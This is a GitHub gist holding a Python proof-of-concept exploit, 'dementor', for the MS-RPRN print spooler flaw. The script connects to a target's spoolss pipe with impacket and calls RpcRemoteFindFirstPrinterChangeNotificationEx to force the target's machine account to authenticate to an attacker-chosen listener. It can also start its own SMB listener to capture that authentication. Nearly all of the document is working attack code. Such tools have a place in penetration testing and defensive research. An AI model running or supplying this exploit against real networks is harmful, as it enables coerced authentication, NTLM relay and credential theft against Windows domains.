Created
July 2, 2020 12:52
-
-
Save S3cur3Th1sSh1t/d9a71ac641432f64e78a6426b5d0b303 to your computer and use it in GitHub Desktop.
MS-RPRN exploit python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser | |
import logging | |
from time import sleep | |
from threading import Thread | |
from impacket import smbserver, smb | |
from impacket.dcerpc.v5 import transport, rprn | |
from impacket.structure import Structure | |
from impacket.uuid import uuidtup_to_bin | |
from impacket.examples import logger | |
target = '' | |
listener = '' | |
debug = False | |
show_banner = """ | |
** | |
** * | |
** ** | |
** ** | |
** ******** **** *** **** | |
*** ** *** *** **** **** *** *** **** ******** * *** * **** **** * | |
********* * *** *** **** *** * * *** **** **** * ** * **** ** **** | |
** **** * *** ** **** **** * *** ** **** ** ** ** ** | |
** ** ** *** ** ** ** ** *** ** ** ** ** ** ** | |
** ** ******** ** ** ** ******** ** ** ** ** ** ** | |
** ** ******* ** ** ** ******* ** ** ** ** ** ** | |
** ** ** ** ** ** ** ** ** ** ** ** ** | |
** ** **** * ** ** ** **** * ** ** ** ****** *** | |
***** ******* *** *** *** ******* *** *** ** **** *** | |
*** ***** *** *** *** ***** *** *** | |
rough PoC to connect to spoolss to elicit machine account authentication | |
implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and | |
code fixes for Windows 10/2016 by @elad_shamir | |
""" | |
class SMBServer(Thread): | |
def __init__(self): | |
Thread.__init__(self) | |
self.smb = None | |
def run(self): | |
# mini config for the server | |
smbConfig = ConfigParser.ConfigParser() | |
smbConfig.add_section('global') | |
smbConfig.set('global', 'server_name','server_name') | |
smbConfig.set('global', 'server_os','Windows') | |
smbConfig.set('global', 'server_domain','WORKGROUP') | |
smbConfig.set('global', 'log_file','') | |
smbConfig.set('global', 'credentials_file','') | |
smbConfig.set("global", 'SMB2Support', 'True') | |
# fake ipc$ | |
smbConfig.add_section('IPC$') | |
smbConfig.set('IPC$', 'comment', '') | |
smbConfig.set('IPC$', 'read only', 'yes') | |
smbConfig.set('IPC$', 'share type', '3') | |
smbConfig.set('IPC$', 'path') | |
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig) | |
self.smb.processConfigFile() | |
# unregister dangerous commands | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY) | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY) | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME) | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE) | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE) | |
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX) | |
try: | |
self.smb.serve_forever() | |
except: | |
pass | |
def stop(self): | |
self.smb.socket.close() | |
self.smb.server_close() | |
self._Thread__stop() | |
def call_open_printer(dce): | |
global debug | |
logging.info("getting context handle...") | |
try: | |
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target) | |
if debug == True: | |
logging.debug("raw response: ") | |
resp.dump() | |
logging.debug("handle is: %s" % binascii.hexlify(resp['pHandle'])) | |
except Exception as e: | |
logging.error("exception " + str(e)) | |
dce.disconnect() | |
sys.exit() | |
return resp['pHandle'] | |
def grab_hash(dce, handle, listener): | |
global debug | |
logging.info("sending RFFPCNEX...") | |
try: | |
resp = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, handle, rprn.PRINTER_CHANGE_ADD_JOB, | |
pszLocalMachine='\\\\%s\x00' % listener) | |
if debug is True: | |
logging.info("raw response: ") | |
resp.dump() | |
except Exception as e: | |
if str(e).find('RPC_S_SERVER_UNAVAILABLE') >= 0: | |
logging.info('Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked') | |
pass | |
else: | |
logging.error("exception %s" % str(e)) | |
def create_connection(domain, username, password, ntlm): | |
# set up connection prereqs | |
# creds | |
creds={} | |
creds['username'] = username | |
creds['password'] = password | |
creds['domain'] = domain | |
creds['nthash'] = ntlm | |
# to transport | |
stringBinding = r'ncacn_np:%s[\pipe\spoolss]' % target | |
rpctransport = transport.DCERPCTransportFactory(stringBinding) | |
if hasattr(rpctransport, 'set_credentials'): | |
rpctransport.set_credentials(creds['username'], creds['password'], creds['domain'], nthash = creds['nthash']) | |
dce = rpctransport.get_dce_rpc() | |
# actually connect | |
logging.info("connecting to %s" % target) | |
try: | |
dce.connect() | |
except Exception as e: | |
if "STATUS_ACCESS_DENIED" in str(e): | |
logging.error("access denied") | |
sys.exit() | |
else: | |
logging.error("unhandled exception occured: %s" % str(e)) | |
sys.exit() | |
# defines the printer endpoint | |
try: | |
dce.bind(rprn.MSRPC_UUID_RPRN) | |
except Exception as e: | |
logging.error("unhandled exception: %s" % str(e)) | |
sys.exit() | |
logging.info("bound to spoolss") | |
return dce | |
def main(): | |
# globals | |
global target | |
global listener | |
global debug | |
global show_banner | |
logger.init() | |
parser = argparse.ArgumentParser(add_help = True, description = "dementor - rough PoC to connect to spoolss to elicit machine account authentication (implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and code fixes by @elad_shamir)") | |
parser.add_argument('-u', '--username', action="store", default='', help='valid username') | |
parser.add_argument('-p', '--password', action="store", default='', help='valid password') | |
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name') | |
parser.add_argument('--ntlm', action="store", default='', help='nt hash') | |
parser.add_argument('--server', action='store_true', default=False, help='create smb listener') | |
parser.add_argument('--debug', action="store_true", default=False, help='enable debugging') | |
parser.add_argument('-q', '--banner', action="store_true", default=False,help='show banner') | |
parser.add_argument('listener', help='ip address or hostname of listener') | |
parser.add_argument('target', help='ip address or hostname of target') | |
options = parser.parse_args() | |
domain = options.domain | |
username = options.username | |
password = options.password | |
ntlm = options.ntlm | |
server = options.server | |
listener = options.listener | |
target = options.target | |
debug = options.debug | |
banner = options.banner | |
if banner is True: | |
print(show_banner) | |
if server is True: | |
logging.info("starting smb server...") | |
server_thread = SMBServer() | |
server_thread.daemon = True | |
server_thread.start() | |
sleep(1) # ensure server starts before continuing | |
logging.info("server running") | |
dce = create_connection(domain, username, password, ntlm) | |
handle = call_open_printer(dce) | |
grab_hash(dce, handle, listener) | |
logging.info("done!") | |
dce.disconnect() | |
sys.exit() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment